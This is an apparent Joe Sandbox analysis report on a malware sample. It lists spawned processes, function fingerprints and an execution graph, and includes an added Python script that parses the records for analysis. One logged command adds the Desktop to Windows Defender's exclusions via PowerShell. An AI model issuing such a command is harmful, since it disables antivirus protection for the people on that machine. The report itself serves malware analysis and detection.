                                                        Target ID:25
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:14:36:12
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Has exited:true

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: piAq
                                                          • API String ID: 0-3273502913
                                                          • Opcode ID: 94c9837211aee94e45cf514690a0c8bc62ed2ce98ebedb98dd3b4ab05d1084d4
                                                          • Instruction ID: bf8e3cae2ad6f17dd24e7008a39c0b00f316460c4a43c0f2f58b002a8e0c0dad
                                                          • Opcode Fuzzy Hash: 94c9837211aee94e45cf514690a0c8bc62ed2ce98ebedb98dd3b4ab05d1084d4
                                                          • Instruction Fuzzy Hash: D5C1EE74E01209CFDB14DFA9C484ADDFBB6BF49304F14866AD819AB365DB30A946CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: ac629262736c87997b90c6ef7dad8468b20906a205ddacecea7d57607784d753
                                                          • Instruction ID: 1975c00254709e1f1074f75d7f84e2f4208bd27c278ebae2c07e05af27cd1ecb
                                                          • Opcode Fuzzy Hash: ac629262736c87997b90c6ef7dad8468b20906a205ddacecea7d57607784d753
                                                          • Instruction Fuzzy Hash: 70B1B574E00218CFDB18DFA9D894A9DBBB2FF89300F148569D419AB395DB34AD46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: 090f821081c7347125b7abd5c31fe1fe6e2a734af6259a15e5434995e4ef86f4
                                                          • Instruction ID: 9471f6ef7418e9e9960d410782c19fefee3a527d5f1742515324233fa5a95aeb
                                                          • Opcode Fuzzy Hash: 090f821081c7347125b7abd5c31fe1fe6e2a734af6259a15e5434995e4ef86f4
                                                          • Instruction Fuzzy Hash: 32B1B478E00218CFDB58DFA9D894A9DBBB2FF89300F108569D419AB395DB34AD46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0aaf62b9cb78bed3a38b8317adb2cc47cf8fd4f7dfb33ab4cdd695892d48b374
                                                          • Instruction ID: b4e24fbc5b47a730fe778f9c8c78794dff375b5e87e07b3289b5d281495422f8
                                                          • Opcode Fuzzy Hash: 0aaf62b9cb78bed3a38b8317adb2cc47cf8fd4f7dfb33ab4cdd695892d48b374
                                                          • Instruction Fuzzy Hash: 3E916D78E022089FCB04DFA9D58499DFBF6BF88310B258665E809AB365D730EE45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d2a0c6a726678a32b2d924148d954f41f00bc92f94cbb6b6906fe59e73d0134
                                                          • Instruction ID: b92ebfb777377808a2b968a52d14b1ad8611a11dc7ff9d63c4d0ae759cf03aab
                                                          • Opcode Fuzzy Hash: 7d2a0c6a726678a32b2d924148d954f41f00bc92f94cbb6b6906fe59e73d0134
                                                          • Instruction Fuzzy Hash: 11117075D042488BDB29DF64D8557EEBBB2BB4A310F18502AD801B3391CB704844CB68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de28fe69b177cc7cb82d2ae2868eca90784ef8c3b3f1ad6ec3537f356818b4a7
                                                          • Instruction ID: 0b520d6a013757cb64dc82c366fd50157e3e54ead05f1a8d5063296b91d14362
                                                          • Opcode Fuzzy Hash: de28fe69b177cc7cb82d2ae2868eca90784ef8c3b3f1ad6ec3537f356818b4a7
                                                          • Instruction Fuzzy Hash: D2512434E00219CFDB14DFA8C484AEDBBB6FF49304F1886AAC459BB255DB30A946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c49217639d2b659bc72f6b760354064851607772232a17922b11f6b80489cffd
                                                          • Instruction ID: cebfe474f57c713abdc193500077e44e280411a513264f69e9369341e25f223d
                                                          • Opcode Fuzzy Hash: c49217639d2b659bc72f6b760354064851607772232a17922b11f6b80489cffd
                                                          • Instruction Fuzzy Hash: 6B311870D012489FDB24DFA9C580AEEBFF5BF48300F288419E919AB350DB759945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 349fd51c70a8985132e2bf03b0f21213d637b9bc48e535229e043749b935eab5
                                                          • Instruction ID: 21e47cb0ba8378dcdaacc35885f10f1e8a63102d37d8d664e39610509af9d394
                                                          • Opcode Fuzzy Hash: 349fd51c70a8985132e2bf03b0f21213d637b9bc48e535229e043749b935eab5
                                                          • Instruction Fuzzy Hash: 88318F35B001449FDB14DB79C490A9EFBF6EF88350B18816AE48ADB315DB30ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1291522dbc5e4f16711ba30bee30fa9668e0eea3f955a76b5c240b9bcdc163bd
                                                          • Instruction ID: 0851b1833b943dfeb65ef78fbdfa863efdcc0181eacc98ffd12f0211e3c15bbd
                                                          • Opcode Fuzzy Hash: 1291522dbc5e4f16711ba30bee30fa9668e0eea3f955a76b5c240b9bcdc163bd
                                                          • Instruction Fuzzy Hash: 7A311770D012489FDB24DFA9C580AEEBFF5BF48310F288429E919AB350DB759945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b9233a1a8f49e1dd899e44995231f226496e4a596172731f96a293e72fc9be3
                                                          • Instruction ID: c63b080f47232e801513862088c4e9810e0daf276ef15dba0e2630ffe3f553a5
                                                          • Opcode Fuzzy Hash: 7b9233a1a8f49e1dd899e44995231f226496e4a596172731f96a293e72fc9be3
                                                          • Instruction Fuzzy Hash: D331F275E012489FDB05DFA8D484ADDBBF6EF89300F14856AE405AB315DB30A946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7218af7ce5568fc57632b5348bf9904479d86096728ad1a748bcd6746219767b
                                                          • Instruction ID: 27614f06e2ca5bbf359668f4e8b30eebab0702f500a1dd3f9ae0ab9313947763
                                                          • Opcode Fuzzy Hash: 7218af7ce5568fc57632b5348bf9904479d86096728ad1a748bcd6746219767b
                                                          • Instruction Fuzzy Hash: 2421287D504304DFEB08DF10D9D0B16BF66FB98324F20C169E8098B656C736D456CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd7f6175ffc5c827e6f3db9ffdbb08513e984b758dbb0c99650c582a1715bd28
                                                          • Instruction ID: 704805791b06bb199fda9e5248b5d507b02d3a86815807b1caff1d6b3671feba
                                                          • Opcode Fuzzy Hash: fd7f6175ffc5c827e6f3db9ffdbb08513e984b758dbb0c99650c582a1715bd28
                                                          • Instruction Fuzzy Hash: 662121BD504204DFEB14DF18D9D0B26BB61FB88324F208569E80D8A657C736D846CAE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcc2f7da8603d9f06b5a1be058c26c00246bab5a5201fceaa3216ee8d9ba7fce
                                                          • Instruction ID: 549cb650b226da9dc6d30c14615a6dac3d6fcabbd3e6819c4e87f6bf0c8ac395
                                                          • Opcode Fuzzy Hash: fcc2f7da8603d9f06b5a1be058c26c00246bab5a5201fceaa3216ee8d9ba7fce
                                                          • Instruction Fuzzy Hash: 64213775E0025A9FCF06DBA8C4509DDBBB5EF49310B008299D955BB295D730A906CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97cad8097c71c32d91d32821e13344971c7ec821e93af43c97399264cbc9ae0c
                                                          • Instruction ID: e270323606c7d9ec482406fd4f0f9de43b8223ddbb77478e9a3a2e746aae8b3b
                                                          • Opcode Fuzzy Hash: 97cad8097c71c32d91d32821e13344971c7ec821e93af43c97399264cbc9ae0c
                                                          • Instruction Fuzzy Hash: 82212575D0025A9FCB06DFA8D4549DDBFB1FF49310B40829AD594AB3A2DB30A906CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a953f741ca8e2906083047ccf841e41706bdd23ecac336a8ea9859ca21287ac
                                                          • Instruction ID: 86097fa42ba2b0ad90c9a2824bef0b14c6cf55d9a57ae1467d32ccc6470fe434
                                                          • Opcode Fuzzy Hash: 7a953f741ca8e2906083047ccf841e41706bdd23ecac336a8ea9859ca21287ac
                                                          • Instruction Fuzzy Hash: CE21E279E012089FDB08DFA9D494ADEBBB2BF89310F14956AE401B7350DB319944CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b21cd015d1ae5b647e8a6088d0bbeda4f65ea66151381fd53aa7cd13e36831d3
                                                          • Instruction ID: 7b8725d7458c34424e5ff1c13d1703ca672f874d38db690b823d9beb1bc7386b
                                                          • Opcode Fuzzy Hash: b21cd015d1ae5b647e8a6088d0bbeda4f65ea66151381fd53aa7cd13e36831d3
                                                          • Instruction Fuzzy Hash: 9821F075E0021A9FCB06DFA8D4549DDBBB5EF49310F4082AAD554BB3A1DB30AA06CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction ID: 22917f675dc2df6849f7a38ff0bbcbb3245afb7d80350a1a3705c0d14cd7875f
                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction Fuzzy Hash: 7811E67A504244CFDB05DF10D5C4B1ABF72FB84324F24C6A9DC498B656C336D456CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction ID: bd577030d3d1c57e7318da6bfb6c604f7bfd3b45c9e089aea207142d00f65da4
                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction Fuzzy Hash: 0111E17A504280CFDB05CF04D9C0B16BF72FB84324F24C5A9D8498B667C336D456CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a16dbef445f95a6e870f2bfde832a314f053dbb6e7ad607db703b3d98feed607
                                                          • Instruction ID: 6646bbfedb15b2e73e7fccdef3701a600371f944adec937bda756446e4fb7efc
                                                          • Opcode Fuzzy Hash: a16dbef445f95a6e870f2bfde832a314f053dbb6e7ad607db703b3d98feed607
                                                          • Instruction Fuzzy Hash: 5A01F7394043049BF7204A21CC95766BFD8DF80229F04C419EC09CE682CB799846CAB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c8af2d1b41af9f71e460f0f4854483eac5b23fa1ff3eb5c0b0eb598a680c624
                                                          • Instruction ID: 39110b1e70bd24fb41097261cb1d25053ed67db2f7cc425ffe6f492e825f60bf
                                                          • Opcode Fuzzy Hash: 5c8af2d1b41af9f71e460f0f4854483eac5b23fa1ff3eb5c0b0eb598a680c624
                                                          • Instruction Fuzzy Hash: 7211D078E00218CFDB24DF68C994B9CBBB1BF48300F108599D409AB365DB30AE86CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 477b665e144c008b1f2297e6a3321d89b55d0765c5a221784646781281621905
                                                          • Instruction ID: 5afcc700430b87215b2eb2fe11e535f995fe35e4498bd02c01d8ec72b92389bd
                                                          • Opcode Fuzzy Hash: 477b665e144c008b1f2297e6a3321d89b55d0765c5a221784646781281621905
                                                          • Instruction Fuzzy Hash: 27F0CD35004344AEE7208A16C884B62FFD8EB80734F18C55AED0C8E282C779A845CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b38961eae0e474cd0796854eb1f302e969638427ec938d051e52210ac9db7b1
                                                          • Instruction ID: 6fbad946f197daf4a0837c38a3348bab78c314efbe6c7b6a43d46db1207a5651
                                                          • Opcode Fuzzy Hash: 1b38961eae0e474cd0796854eb1f302e969638427ec938d051e52210ac9db7b1
                                                          • Instruction Fuzzy Hash: ACF0B4387041446FD714DE59D440EAEBBAAEFC9220718C0ABF849CB702DB709843CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de92ab37866f3d989f2199eadb9acfbe150c9b47764d9845b2424d1793fa73a1
                                                          • Instruction ID: 2bea578d9c61f67df61cc194d18e9cf9b518ddafc299c10bda7a73dc1b7a8d8f
                                                          • Opcode Fuzzy Hash: de92ab37866f3d989f2199eadb9acfbe150c9b47764d9845b2424d1793fa73a1
                                                          • Instruction Fuzzy Hash: 40D0C935F50108ABCF14CFCAE8408DCBB31EFC5235F005255D566BB294C73099168F88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
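The function records above all have the same shape, so in practice they are consumed as data rather than read one by one. The Python below is an added example, not Joe Sandbox tooling: it parses three records copied from this page, groups them by Opcode ID, and decodes the dotted .sdmp file name. Two records on this page share Opcode ID 099256442a3ab3 but carry different Instruction IDs, and the grouping surfaces that. The split of the .sdmp name into fields, and the reading of its 00000040 and 00020000 fields as the winnt.h constants PAGE_EXECUTE_READWRITE and MEM_PRIVATE, are assumptions of this example; only the base-address field is confirmed by the Offset value printed next to it in each record.

```python
"""Parse Joe Sandbox function-fingerprint records into structured data.

Added example, not Joe Sandbox tooling. SAMPLE is three records copied from
this report. Splitting the .sdmp name into fields, and reading two of those
fields as winnt.h protection / memory-type constants, are assumptions of this
example; only the base-address field is confirmed by the printed Offset.
"""
import re
from collections import defaultdict

# Constructed input: three records copied from the report, trimmed to the
# lines this script uses.
SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
• Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
• Opcode ID: 5c8af2d1b41af9f71e460f0f4854483eac5b23fa1ff3eb5c0b0eb598a680c624
• Instruction ID: 39110b1e70bd24fb41097261cb1d25053ed67db2f7cc425ffe6f492e825f60bf
Memory Dump Source
• Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
• Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: 22917f675dc2df6849f7a38ff0bbcbb3245afb7d80350a1a3705c0d14cd7875f
Memory Dump Source
• Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
• Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: bd577030d3d1c57e7318da6bfb6c604f7bfd3b45c9e089aea207142d00f65da4
"""

# winnt.h constants; which .sdmp name fields hold them is assumed (see docstring).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SOURCE_RE = re.compile(r"(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$", re.M)


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record in the report text."""
    records = []
    for chunk in re.split(r"^Memory Dump Source\s*$", text, flags=re.M)[1:]:
        rec = {k.strip(): v.strip() for k, v in FIELD_RE.findall(chunk)}
        m = SOURCE_RE.match(rec.get("Source File", ""))
        if not m:
            raise ValueError("record without a parsable Source File line")
        rec["sdmp"] = m.group(1)
        rec["offset"] = int(m.group(2), 16)
        rec["pe_backed"] = m.group(3) == "true"
        records.append(rec)
    return records


def decode_sdmp_name(name):
    """Decode the dotted .sdmp file name.

    Assumed field order (this example's reading of the names on the page):
    process index . snapshot . dump id . base address . protection . flags .
    memory type . reserved. Only the base address is cross-checked below.
    """
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name layout: {name}")
    prot, mtype = int(fields[4], 16), int(fields[6], 16)
    return {
        "process_index": int(fields[0]),
        "snapshot": int(fields[1]),
        "dump_id": fields[2],
        "base": int(fields[3], 16),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "flags": fields[5],
        "mem_type": MEM_TYPE.get(mtype, hex(mtype)),
    }


def summarize(records):
    """Group Instruction IDs by Opcode ID and list RWX, non-PE-backed regions.

    Records sharing an Opcode ID but differing in Instruction ID are, on this
    example's reading of the two hash names, the same opcode sequence with
    different operands. Executable-writable private memory that is not backed
    by a PE image is where unpacked or runtime-generated code lives, so those
    regions are listed separately.
    """
    by_opcode = defaultdict(list)
    flagged = set()
    for rec in records:
        by_opcode[rec["Opcode ID"]].append(rec["Instruction ID"])
        info = decode_sdmp_name(rec["sdmp"])
        if info["base"] != rec["offset"]:  # ties the assumed field to the printed Offset
            raise ValueError(f"base {info['base']:#x} != offset {rec['offset']:#x}")
        if info["protect"] == "PAGE_EXECUTE_READWRITE" and not rec["pe_backed"]:
            flagged.add((f"{info['base']:#x}", info["mem_type"]))
    return dict(by_opcode), sorted(flagged)


if __name__ == "__main__":
    by_opcode, flagged = summarize(parse_records(SAMPLE))
    for opcode_id, instr_ids in by_opcode.items():
        print(f"{opcode_id[:16]}...  {len(instr_ids)} record(s), "
              f"{len(set(instr_ids))} distinct Instruction ID(s)")
    print("RWX, not PE-backed:", flagged)
```

To run it over the whole report, paste the text of the function records into SAMPLE (or read it from a file); the cross-check in summarize raises if the assumed base-address field ever disagrees with the printed Offset, which is the signal that the assumed name layout is wrong for that report.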

                                                          Execution Graph

                                                          Execution Coverage: 5.8%
                                                          Dynamic/Decrypted Code Coverage: 0%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 3
                                                          Total number of Limit Nodes: 0
                                                          execution_graph 24498 8a46650 24499 8a46658 SetThreadToken 24498->24499 24501 8a466c1 24499->24501

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1064 498b490-498b4b9 1065 498b4bb 1064->1065 1066 498b4be-498b7f9 call 498aab4 1064->1066 1065->1066 1127 498b7fe-498b805 1066->1127
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d3556adf065c060d19cd960882d1ab874fb4fade467561f9a8c60b64a349b42
                                                          • Instruction ID: 7c1dbd7dfdff8bc4c5330151d35df7a8f74b3c8c4a25d0a450a995b3a99201a6
                                                          • Opcode Fuzzy Hash: 0d3556adf065c060d19cd960882d1ab874fb4fade467561f9a8c60b64a349b42
                                                          • Instruction Fuzzy Hash: 27913074F007185BEB19EFB985106AEBBE3EF84700B00892DE556AB344DF74AE058BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1212 498b4a0-498b4b9 1213 498b4bb 1212->1213 1214 498b4be-498b7f9 call 498aab4 1212->1214 1213->1214 1275 498b7fe-498b805 1214->1275
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c301b2aab11894e1b9082654a004576cf91ea531ddb93b0bc65c186af20a8d
                                                          • Instruction ID: 972a1a7669cd6e836ce55dac24e3875bb9ecf02bfa3462028d550452c77a5829
